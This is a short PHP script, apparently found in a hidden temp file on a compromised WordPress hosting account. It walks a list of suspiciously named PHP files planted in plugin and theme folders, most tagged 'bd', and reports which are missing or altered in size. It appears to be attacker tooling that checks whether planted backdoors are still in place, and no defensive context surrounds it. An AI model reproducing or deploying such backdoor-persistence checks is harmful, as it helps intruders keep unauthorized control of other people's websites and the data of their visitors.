/home/sylamedg/.cagefs/tmp/.bind
<?php $r = '/home/sylamedg/public_html'; $x = ["/wp-content/plugins/unbounce/css/param.php"=>"bd@@175045909@@796",
"/wp-content/themes/news-brick-kit/File_dm.php"=>"bd@@175050067@@805",
"/wp-content/themes/cloud.php"=>"bd@@175053908@@602",
"/wp-content/themes/File_dm.php"=>"bd@@175053910@@805",
"/32next.php"=>"bd@@242527639@@1033",
"/71.php"=>"bd@@242527640@@1196",
"/comp.php"=>"bd@@242527643@@1137",
"/fput.php"=>"bd@@242527645@@831",
"/port.php"=>"bd@@242356134@@621",
"/wp-content/plugins/cc-child-pages/build/cc-child-pages/indexns.php"=>"bd@@229890238@@616",
"/wp-content/plugins/my-wp-ab-testing/css/File_dm.php"=>"bd@@175045908@@805",
"/wp-content/themes/siara-marketing-agency/assets/custom/js/param.php"=>"bd@@175050069@@796",
"/wp-content/plugins/convertpro/assets/css/cloud.php"=>"bd@@175045907@@602",
"/param.php"=>"bd@@242356133@@601",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Filter/invitation.php"=>"ui@@1249294@@341",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/Filter/link_filters.php"=>"ui@@1253829@@1250"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');